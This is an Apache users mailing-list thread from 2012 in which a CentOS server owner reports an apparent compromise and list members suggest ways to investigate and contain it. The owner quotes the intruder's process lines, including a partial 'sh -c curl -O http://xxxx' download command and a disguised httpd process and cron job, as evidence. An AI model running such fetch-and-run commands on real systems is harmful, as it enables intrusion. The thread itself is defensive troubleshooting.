You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Luisa Ester Navarro <lu...@hotmail.com> on 2012/01/09 16:11:05 UTC
[users@httpd] attack on apache
My server is being attacked. I think it is from apache because I have found commands running with the owner apache.
My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL and sh -c curl -o http ....
They also run every minutes a crontab from /var/spool/cron and I din´t have anyone there.
I am using Centos 5.7 and httpd-2.2.3.53-el5.centos.3 and my system is update.
Can someone help me?
Thanks in advance
Luisa
Re: [users@httpd] attack on apache
Posted by "Kevin A. McGrail" <KM...@PCCC.com>.
> any idea how to start researching which is the leaky script
Checking the access log for the same ip that was getting the errors you
found in the error_log is a good start.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] attack on apache
Posted by Jaco Kroon <ja...@uls.co.za>.
Hi,
On 12/01/12 00:14, Jeroen Geilman wrote:
> On 01/11/2012 10:10 PM, Jaco Kroon wrote:
>> On 11/01/12 22:37, Luisa Ester Navarro wrote:
>>>
>>>
>>> ------------------------------------------------------------------------
>>> J.
>>> Thanks Jeron:
>>> any idea how to start researching which is the leaky script
>>> Cheers
>>> Luisa
>> Hehe, this is where they say, RTFS, or as Jeron suggested, see if you
>> can correlate something in the logs. If apache is still running and
>> you happen to have mod_info, it's useful as it at least gives you the
>> paths being processed, often the "child script" will hold up the
>> processing and you can then spot the script in use in the mod_info
>> data, in other cases, it's a wild goose chase.
>
> I think you are referring to the server-status handler provided by
> mod_status, which shows the URIs currently being served if you set the
> gloabl option ExtendedStatus to On.
Of course you right - my mistake.
Kind Regards,
Jaco
Re: [users@httpd] attack on apache
Posted by Jeroen Geilman <je...@adaptr.nl>.
On 01/11/2012 10:10 PM, Jaco Kroon wrote:
> On 11/01/12 22:37, Luisa Ester Navarro wrote:
>>
>>
>> ------------------------------------------------------------------------
>> J.
>> Thanks Jeron:
>> any idea how to start researching which is the leaky script
>> Cheers
>> Luisa
> Hehe, this is where they say, RTFS, or as Jeron suggested, see if you
> can correlate something in the logs. If apache is still running and
> you happen to have mod_info, it's useful as it at least gives you the
> paths being processed, often the "child script" will hold up the
> processing and you can then spot the script in use in the mod_info
> data, in other cases, it's a wild goose chase.
I think you are referring to the server-status handler provided by
mod_status, which shows the URIs currently being served if you set the
gloabl option ExtendedStatus to On.
--
J.
Re: [users@httpd] attack on apache
Posted by Jaco Kroon <ja...@uls.co.za>.
On 11/01/12 22:37, Luisa Ester Navarro wrote:
>
>
> ------------------------------------------------------------------------
> J.
> Thanks Jeron:
> any idea how to start researching which is the leaky script
> Cheers
> Luisa
Hehe, this is where they say, RTFS, or as Jeron suggested, see if you
can correlate something in the logs. If apache is still running and you
happen to have mod_info, it's useful as it at least gives you the paths
being processed, often the "child script" will hold up the processing
and you can then spot the script in use in the mod_info data, in other
cases, it's a wild goose chase.
mpm_user also helps to narrow things down in case of vhost setups (ISP
... find the offending user - disable the vhost - that usually gets the
offenders attention, and when you tell him/her that his code is bust
they need to audit their code they usually end up paying me for my time
to do it, which usually just involves pointing to one of the lastest
joomla/wordpress/flavor of the month CMS exploits).
With respect to the logs, often you'll find URIs in the get parameters,
so perhaps you can try grepping your logs for a regex, something like
"grep -E "\?.*http://" and see if that shows anything.
I'm afraid there are no real shortcuts.
Good luck.
JK
RE: [users@httpd] attack on apache
Posted by Luisa Ester Navarro <lu...@hotmail.com>.
Date: Wed, 11 Jan 2012 21:13:53 +0100
From: jeroen@adaptr.nl
To: users@httpd.apache.org
Subject: Re: [users@httpd] attack on apache
On 01/11/2012 09:10 PM, Jaco Kroon wrote:
On 11/01/12 21:35, Jeroen Geilman wrote:
In /var/log/httpd/error_log I see hink like this
sh: del comand no found
sh: xx Permission denied
I need help !
1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed
this exploit.
3. remove the bad script.
4. Remount /tmp with noexec,nosuid,nodev to prevent the majority
of these types of exploits.
Surely you noticed that I did not advise him to turn it back on - at
all ? ;)
But yes, distros that don't protect /tmp suck.
--
J.
Thanks Jeron:
any idea how to start researching which is the leaky script
Cheers
Luisa
Re: [users@httpd] attack on apache
Posted by Jeroen Geilman <je...@adaptr.nl>.
On 01/11/2012 09:10 PM, Jaco Kroon wrote:
> On 11/01/12 21:35, Jeroen Geilman wrote:
>>
>>>
>>> In /var/log/httpd/error_log I see hink like this
>>> sh: del comand no found
>>> sh: xx Permission denied
>>>
>>> I need help !
>>>
>>
>> 1. Stop apache.
>> 2. investigate which leaky, creaky or lousy PHP script allowed this
>> exploit.
>> 3. remove the bad script.
> 4. Remount /tmp with noexec,nosuid,nodev to prevent the majority of
> these types of exploits.
Surely you noticed that I did not advise him to turn it back on - at all
? ;)
But yes, distros that don't protect /tmp suck.
--
J.
Re: [users@httpd] attack on apache
Posted by Jaco Kroon <ja...@uls.co.za>.
On 11/01/12 21:35, Jeroen Geilman wrote:
>
>>
>> In /var/log/httpd/error_log I see hink like this
>> sh: del comand no found
>> sh: xx Permission denied
>>
>> I need help !
>>
>
> 1. Stop apache.
> 2. investigate which leaky, creaky or lousy PHP script allowed this
> exploit.
> 3. remove the bad script.
4. Remount /tmp with noexec,nosuid,nodev to prevent the majority of
these types of exploits.
It doesn't eliminate them, just prevents the majority of "canned" ones
that I'm aware of.
JK
Re: [users@httpd] attack on apache
Posted by Jeroen Geilman <je...@adaptr.nl>.
On 01/11/2012 08:24 PM, Luisa Ester Navarro wrote:
>
>
> ------------------------------------------------------------------------
> From: luisa2010@hotmail.com
> To: users@httpd.apache.org
> Subject: RE: [users@httpd] attack on apache
> Date: Wed, 11 Jan 2012 16:15:14 -0300
>
>
>
> > Date: Mon, 9 Jan 2012 17:30:21 +0000
> > From: tevans.uk@googlemail.com
> > To: users@httpd.apache.org
> > Subject: Re: FW: [users@httpd] attack on apache
> >
> > On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
> > <lu...@hotmail.com> wrote:
> > >
> > >
> > > ________________________________
> > >
> > > I didn´t have any cronjobs but when I detected the attack I saw
> one in
> > > /var/spool/cron
> > > My logifle says
> > > User apache:
> > >
> > > /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> > >
> > > personal crontab deleted: 56 Time(s)
> > >
> > > personal crontab listed: 1 Time(s)
> > >
> > > personal crontab replaced: 1 Time(s)
> > >
> > > Thanks
> > >
> >
> > Google tells me that this is output from a cpanel perl script -
> > probably a crontab editor. crontabs are not evidence of an attack.
> >
>
> > You need to show more details of what you think is happening, and why
> > you think it is malicious.
> > Cheers
>
> Tom
>
> I think it is an attack because I found this commands running on my
> server (with owner apache)
>
> /usr/local/apache/bin/httpd - DSFSL
> sh -c curl -O http://xxxx
>
> I also found a folder proc in /var/named/chroot. this folder is the
> same as /proc, is updated with the original /proc and I can't delete.
That is a bind mount, and probably unrelated. It may be necessary to run
BIND chrooted.
>
> In /var/log/httpd/error_log I see hink like this
> sh: del comand no found
> sh: xx Permission denied
>
> I need help !
>
1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this exploit.
3. remove the bad script.
--
J.
RE: [users@httpd] attack on apache
Posted by Luisa Ester Navarro <lu...@hotmail.com>.
From: luisa2010@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300
> Date: Mon, 9 Jan 2012 17:30:21 +0000
> From: tevans.uk@googlemail.com
> To: users@httpd.apache.org
> Subject: Re: FW: [users@httpd] attack on apache
>
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
> <lu...@hotmail.com> wrote:
> >
> >
> > ________________________________
> >
> > I didn´t have any cronjobs but when I detected the attack I saw one in
> > /var/spool/cron
> > My logifle says
> > User apache:
> >
> > /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> >
> > personal crontab deleted: 56 Time(s)
> >
> > personal crontab listed: 1 Time(s)
> >
> > personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
>
> Google tells me that this is output from a cpanel perl script -
> probably a crontab editor. crontabs are not evidence of an attack.
>
> You need to show more details of what you think is happening, and why
> you think it is malicious.
> Cheers
Tom
I think it is an attack because I found this commands running on my server (with owner apache)
/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O http://xxxx
I also found a folder proc in /var/named/chroot. this folder is the same as /proc, is updated with the original /proc and I can't delete.
In /var/log/httpd/error_log I see hink like this
sh: del comand no found
sh: xx Permission denied
I need help !
Thanks
Luisa
Re: FW: [users@httpd] attack on apache
Posted by Tom Evans <te...@googlemail.com>.
On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
<lu...@hotmail.com> wrote:
>
>
> ________________________________
>
> I didn´t have any cronjobs but when I detected the attack I saw one in
> /var/spool/cron
> My logifle says
> User apache:
>
> /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
>
> personal crontab deleted: 56 Time(s)
>
> personal crontab listed: 1 Time(s)
>
> personal crontab replaced: 1 Time(s)
>
> Thanks
>
Google tells me that this is output from a cpanel perl script -
probably a crontab editor. crontabs are not evidence of an attack.
You need to show more details of what you think is happening, and why
you think it is malicious.
Cheers
Tom
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
FW: [users@httpd] attack on apache
Posted by Luisa Ester Navarro <lu...@hotmail.com>.
I didn´t have any cronjobs but when I detected the attack I saw one in /var/spool/cron
My logifle says
User apache: /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s) personal crontab deleted: 56 Time(s) personal crontab listed: 1 Time(s) personal crontab replaced: 1 Time(s)Thanks
> Date: Mon, 9 Jan 2012 18:05:38 +0100
> From: info@simonecaruso.com
> To: users@httpd.apache.org
> CC: luisa2010@hotmail.com
> Subject: Re: [users@httpd] attack on apache
>
> On 09/01/2012 16:11, Luisa Ester Navarro wrote:
> > My server is being attacked. I think it is from apache because I have found
> > commands running with the owner apache.
> > My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL
> > and sh -c curl -o http ....
> >
>
> I don't think they exploited apache, maybe an application level bug. Are the
> cronjobs running as the apache user?
>
>
> --
> Simone Caruso
> IT Consultant
> +39 349 65 90 805
Re: [users@httpd] attack on apache
Posted by Simone Caruso <in...@simonecaruso.com>.
On 09/01/2012 16:11, Luisa Ester Navarro wrote:
> My server is being attacked. I think it is from apache because I have found
> commands running with the owner apache.
> My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL
> and sh -c curl -o http ....
>
I don't think they exploited apache, maybe an application level bug. Are the
cronjobs running as the apache user?
--
Simone Caruso
IT Consultant
+39 349 65 90 805
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org